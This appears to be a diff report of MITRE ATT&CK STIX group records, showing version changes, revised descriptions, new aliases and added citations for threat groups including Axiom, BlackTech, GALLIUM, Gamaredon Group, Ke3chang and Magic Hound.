external_references[33]['source_name']Microsoft STRONTIUM Aug 2019Secureworks IRON TWILIGHT Active Measures March 2017
external_references[33]['description']MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.
external_references[33]['url']https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/https://www.secureworks.com/research/iron-twilight-supports-active-measures
external_references[34]['source_name']Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020Accenture SNAKEMACKEREL Nov 2018
external_references[34]['description']Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
external_references[34]['url']https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50
x_mitre_version3.24.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesIRON TWILIGHT
external_references{'source_name': 'TrendMicro Pawn Storm Dec 2020', 'description': 'Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.', 'url': 'https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html'}
external_references{'source_name': 'Microsoft STRONTIUM Aug 2019', 'description': 'MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.', 'url': 'https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/'}
external_references{'source_name': 'Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020', 'description': 'Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.', 'url': 'https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/'}

[G0001] Axiom

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1[Axiom](https://attack.mitre.org/groups/G0001) is a cyber est1[Axiom](https://attack.mitre.org/groups/G0001) is a suspecte
>pionage group suspected to be associated with the Chinese go>d Chinese cyber espionage group that has targeted the aerosp
>vernment. It is responsible for the Operation SMN campaign. >ace, defense, government, manufacturing, and media sectors s
>(Citation: Novetta-Axiom) Though both this group and [Winnti>ince at least 2008. Some reporting suggests a degree of over
> Group](https://attack.mitre.org/groups/G0044) use the malwa>lap between [Axiom](https://attack.mitre.org/groups/G0001) a
>re [Winnti for Windows](https://attack.mitre.org/software/S0>nd [Winnti Group](https://attack.mitre.org/groups/G0044) but
>141), the two groups appear to be distinct based on differen> the two groups appear to be distinct based on differences i
>ces in reporting on the groups' TTPs and targeting. (Citatio>n reporting on TTPs and targeting.(Citation: Kaspersky Winnt
>n: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti >i April 2013)(Citation: Kaspersky Winnti June 2015)(Citation
>June 2015) (Citation: Novetta Winnti April 2015)>: Novetta Winnti April 2015)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:52:38.226000+00:002022-04-15 15:52:00.359000+00:00
description[Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti for Windows](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)[Axiom](https://attack.mitre.org/groups/G0001) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://attack.mitre.org/groups/G0001) and [Winnti Group](https://attack.mitre.org/groups/G0044) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015)
external_references[1]['source_name']AxiomGroup 72
external_references[1]['description'](Citation: Novetta-Axiom)(Citation: Cisco Group 72)
external_references[2]['source_name']Group 72Axiom
external_references[2]['description'](Citation: Cisco Group 72)(Citation: Novetta-Axiom)
external_references[3]['source_name']Novetta-AxiomCisco Group 72
external_references[3]['description']Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.Esler, J., Lee, M., and Williams, C. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016.
external_references[3]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttp://blogs.cisco.com/security/talos/threat-spotlight-group-72
external_references[5]['source_name']Kaspersky Winnti June 2015Novetta Winnti April 2015
external_references[5]['description']Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016.Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.
external_references[5]['url']https://securelist.com/games-are-over/70991/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
external_references[6]['source_name']Novetta Winnti April 2015Novetta-Axiom
external_references[6]['description']Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.
external_references[6]['url']http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdfhttp://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
external_references[7]['source_name']Cisco Group 72Kaspersky Winnti June 2015
external_references[7]['description']Esler, J., Lee, M., and Williams, C.. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016.Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016.
external_references[7]['url']http://blogs.cisco.com/security/talos/threat-spotlight-group-72https://securelist.com/games-are-over/70991/
x_mitre_version1.22.0

[G0098] BlackTech

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[BlackTech](https://attack.mitre.org/groups/G0098) is a cybet1[BlackTech](https://attack.mitre.org/groups/G0098) is a susp
>r espionage group operating against targets in East Asia, pa>ected Chinese cyber espionage group that has primarily targe
>rticularly Taiwan, and occasionally, Japan and Hong Kong.(Ci>ted organizations in East Asia--particularly Taiwan, Japan, 
>tation: TrendMicro BlackTech June 2017)>and Hong Kong--and the US since at least 2013. [BlackTech](h
 >ttps://attack.mitre.org/groups/G0098) has used a combination
 > of custom malware, dual-use tools, and living off the land 
 >tactics to compromise media, construction, engineering, elec
 >tronics, and financial company networks.(Citation: TrendMicr
 >o BlackTech June 2017)(Citation: Symantec Palmerworm Sep 202
 >0)(Citation: Reuters Taiwan BlackTech August 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 17:57:07.909000+00:002022-04-06 13:14:27.477000+00:00
description[BlackTech](https://attack.mitre.org/groups/G0098) is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.(Citation: TrendMicro BlackTech June 2017)[BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)
external_references[1]['source_name']TrendMicro BlackTech June 2017Palmerworm
external_references[1]['description']Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.(Citation: Symantec Palmerworm Sep 2020)(Citation: IronNet BlackTech Oct 2021)
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesPalmerworm
external_references{'source_name': 'TrendMicro BlackTech June 2017', 'description': 'Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.', 'url': 'https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/'}
external_references{'source_name': 'IronNet BlackTech Oct 2021', 'description': 'Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022.', 'url': 'https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape'}
external_references{'source_name': 'Reuters Taiwan BlackTech August 2020', 'description': 'Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022.', 'url': 'https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK'}
external_references{'source_name': 'Symantec Palmerworm Sep 2020', 'description': 'Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt'}
x_mitre_contributorsHannah Simes, BT Security

[G0093] GALLIUM

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1[GALLIUM](https://attack.mitre.org/groups/G0093) is a group t1[GALLIUM](https://attack.mitre.org/groups/G0093) is a cybere
>that has been active since at least 2012, primarily targetin>spionage group that has been active since at least 2012, pri
>g high-profile telecommunications networks. [GALLIUM](https:>marily targeting telecommunications companies, financial ins
>//attack.mitre.org/groups/G0093) has been identified in some>titutions, and government entities in Afghanistan, Australia
> reporting as likely a Chinese state-sponsored group, based >, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, 
>in part on tools used and TTPs commonly associated with Chin>Russia, and Vietnam. Security researchers have identified [G
>ese threat actors.(Citation: Cybereason Soft Cell June 2019)>ALLIUM](https://attack.mitre.org/groups/G0093) as a likely C
>(Citation: Microsoft GALLIUM December 2019)>hinese state-sponsored group, based in part on tools used an
 >d TTPs commonly associated with Chinese threat actors.(Citat
 >ion: Cybereason Soft Cell June 2019)(Citation: Microsoft GAL
 >LIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 01:32:21.874000+00:002022-08-12 21:26:22.303000+00:00
description[GALLIUM](https://attack.mitre.org/groups/G0093) is a group that has been active since at least 2012, primarily targeting high-profile telecommunications networks. [GALLIUM](https://attack.mitre.org/groups/G0093) has been identified in some reporting as likely a Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)
external_references[1]['source_name']GALLIUMOperation Soft Cell
external_references[1]['description'](Citation: Microsoft GALLIUM December 2019)(Citation: Cybereason Soft Cell June 2019)
external_references[2]['source_name']Operation Soft CellGALLIUM
external_references[2]['description'](Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit 42 PingPull Jun 2022', 'description': 'Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.', 'url': 'https://unit42.paloaltonetworks.com/pingpull-gallium/'}

[G0047] Gamaredon Group

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1[Gamaredon Group](https://attack.mitre.org/groups/G0047) is t1[Gamaredon Group](https://attack.mitre.org/groups/G0047) is 
>a threat group that has been active since at least 2013 and >a suspected Russian cyber espionage threat group that has ta
>has targeted individuals likely involved in the Ukrainian go>rgeted military, NGO, judiciary, law enforcement, and non-pr
>vernment. The name [Gamaredon Group](https://attack.mitre.or>ofit organizations in Ukraine since at least 2013. The name 
>g/groups/G0047) comes from a misspelling of the word "Armage>[Gamaredon Group](https://attack.mitre.org/groups/G0047) com
>ddon", which was detected in the adversary's early campaigns>es from a misspelling of the word "Armageddon", which was de
>.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMic>tected in the adversary's early campaigns.(Citation: Palo Al
>ro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)>to Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 
 >2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec
 > Shuckworm January 2022)(Citation: Microsoft Actinium Februa
 >ry 2022)  In November 2021, the Ukrainian government publicl
 >y attributed [Gamaredon Group](https://attack.mitre.org/grou
 >ps/G0047) to Russia's Federal Security Service (FSB) Center 
 >18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(
 >Citation: Microsoft Actinium February 2022)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/
external_referenceshttps://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/
external_referenceshttps://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/
values_changed
STIX FieldOld valueNew Value
modified2021-01-20 22:20:20.981000+00:002022-04-15 13:46:34.474000+00:00
description[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022) In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia's Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022)
external_references[1]['source_name']Gamaredon GroupACTINIUM
external_references[1]['description'](Citation: Palo Alto Gamaredon Feb 2017)(Citation: Microsoft Actinium February 2022)
external_references[2]['source_name']Palo Alto Gamaredon Feb 2017DEV-0157
external_references[2]['description']Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.(Citation: Microsoft Actinium February 2022)
external_references[3]['source_name']TrendMicro Gamaredon April 2020Gamaredon Group
external_references[3]['description']Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.(Citation: Palo Alto Gamaredon Feb 2017)
external_references[4]['source_name']ESET Gamaredon June 2020IRON TILDEN
external_references[4]['description']Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.(Citation: Secureworks IRON TILDEN Profile)
x_mitre_version1.22.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesIRON TILDEN
aliasesPrimitive Bear
aliasesACTINIUM
aliasesArmageddon
aliasesShuckworm
aliasesDEV-0157
external_references{'source_name': 'Armageddon', 'description': '(Citation: Symantec Shuckworm January 2022)'}
external_references{'source_name': 'Shuckworm', 'description': '(Citation: Symantec Shuckworm January 2022)'}
external_references{'source_name': 'Primitive Bear', 'description': '(Citation: Unit 42 Gamaredon February 2022)'}
external_references{'source_name': 'ESET Gamaredon June 2020', 'description': 'Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.', 'url': 'https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/'}
external_references{'source_name': 'TrendMicro Gamaredon April 2020', 'description': 'Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.', 'url': 'https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/'}
external_references{'source_name': 'Palo Alto Gamaredon Feb 2017', 'description': 'Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.', 'url': 'https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/'}
external_references{'source_name': 'Microsoft Actinium February 2022', 'description': 'Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.', 'url': 'https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/'}
external_references{'source_name': 'Secureworks IRON TILDEN Profile', 'description': 'Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-tilden'}
external_references{'source_name': 'Symantec Shuckworm January 2022', 'description': 'Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine'}
external_references{'source_name': 'Bleepingcomputer Gamardeon FSB November 2021', 'description': 'Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.', 'url': 'https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/'}
external_references{'source_name': 'Unit 42 Gamaredon February 2022', 'description': 'Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.', 'url': 'https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/'}

[G0004] Ke3chang

Current version: 2.0

Version changed from: 1.4 → 2.0


Old Description
New Description
t1[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat1[Ke3chang](https://attack.mitre.org/groups/G0004) is a threa
>t group attributed to actors operating out of China. [Ke3cha>t group attributed to actors operating out of China. [Ke3cha
>ng](https://attack.mitre.org/groups/G0004) has targeted seve>ng](https://attack.mitre.org/groups/G0004) has targeted oil,
>ral industries, including oil, government, military, and mor> government, diplomatic, military, and NGOs in Central and S
>e.(Citation: Mandiant Operation Ke3chang November 2014)(Cita>outh America, the Caribbean, Europe, and North America since
>tion: NCC Group APT15 Alive and Strong)(Citation: APT15 Inte> at least 2010.(Citation: Mandiant Operation Ke3chang Novemb
>zer June 2018)>er 2014)(Citation: NCC Group APT15 Alive and Strong)(Citatio
 >n: APT15 Intezer June 2018)(Citation: Microsoft NICKEL Decem
 >ber 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Pooja Natarajan, NEC Corporation India', 'Manikantan Srinivasan, NEC Corporation India', 'Hiroki Nagahama, NEC Corporation']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs
values_changed
STIX FieldOld valueNew Value
modified2021-11-01 21:12:15.839000+00:002022-07-22 18:52:32.762000+00:00
description[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted several industries, including oil, government, military, and more.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021)
external_references[1]['source_name']Ke3changRoyalAPT
external_references[1]['description'](Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018)(Citation: APT15 Intezer June 2018)
external_references[2]['source_name']APT15NICKEL
external_references[2]['description'](Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)
external_references[3]['source_name']MirageAPT15
external_references[4]['source_name']Vixen PandaMirage
external_references[4]['description'](Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018)(Citation: NCC Group APT15 Alive and Strong)
external_references[6]['source_name']Playful DragonVixen Panda
external_references[6]['description'](Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)
external_references[7]['source_name']RoyalAPTPlayful Dragon
external_references[7]['description'](Citation: APT15 Intezer June 2018)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)
external_references[8]['source_name']Mandiant Operation Ke3chang November 2014Ke3chang
external_references[8]['description']Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.(Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018)
external_references[9]['source_name']NCC Group APT15 Alive and StrongMicrosoft NICKEL December 2021
external_references[9]['description']Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022.
external_references[9]['url']https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe
external_references[10]['url']https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/
x_mitre_version1.42.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesNICKEL
external_references{'source_name': 'NCC Group APT15 Alive and Strong', 'description': 'Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.', 'url': 'https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/'}
external_references{'source_name': 'Mandiant Operation Ke3chang November 2014', 'description': 'Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.', 'url': 'https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs'}
external_references{'source_name': 'Villeneuve et al 2014', 'description': 'Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.', 'url': 'https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf'}

[G0059] Magic Hound

Current version: 5.0

Version changed from: 4.0 → 5.0


Old Description
New Description
t1[Magic Hound](https://attack.mitre.org/groups/G0059) is an It1[Magic Hound](https://attack.mitre.org/groups/G0059) is an I
>ranian-sponsored threat group that conducts long term, resou>ranian-sponsored threat group that conducts long term, resou
>rce-intensive cyber espionage operations, likely on behalf o>rce-intensive cyber espionage operations, likely on behalf o
>f the Islamic Revolutionary Guard Corps. They have targeted >f the Islamic Revolutionary Guard Corps. They have targeted 
>U.S. and Middle Eastern government and military personnel, a>European, U.S., and Middle Eastern government and military p
>cademics, journalists, and organizations such as the World H>ersonnel, academics, journalists, and organizations such as 
>ealth Organization (WHO), via complex social engineering cam>the World Health Organization (WHO), via complex social engi
>paigns since at least 2014.(Citation: FireEye APT35 2018)(Ci>neering campaigns since at least 2014.(Citation: FireEye APT
>tation: ClearSky Kittens Back 3 August 2020)(Citation: Certf>35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Cita
>a Charming Kitten January 2021)(Citation: Secureworks COBALT>tion: Certfa Charming Kitten January 2021)(Citation: Securew
> ILLUSION Threat Profile)(Citation: Proofpoint TA453 July202>orks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA
>1)>453 July2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering
values_changed
STIX FieldOld valueNew Value
modified2021-10-04 13:12:54.646000+00:002022-06-03 13:20:02.945000+00:00
description[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted U.S. and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)
external_references[1]['source_name']Magic HoundCharming Kitten
external_references[1]['description'](Citation: Unit 42 Magic Hound Feb 2017)(Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)
external_references[2]['source_name']TA453APT35
external_references[2]['description'](Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)(Citation: Check Point APT35 CharmPower January 2022)
external_references[3]['source_name']COBALT ILLUSIONITG18
external_references[3]['description'](Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: IBM ITG18 2020)
external_references[4]['source_name']Charming KittenPhosphorus
external_references[4]['description'](Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)
external_references[5]['source_name']ITG18TA453
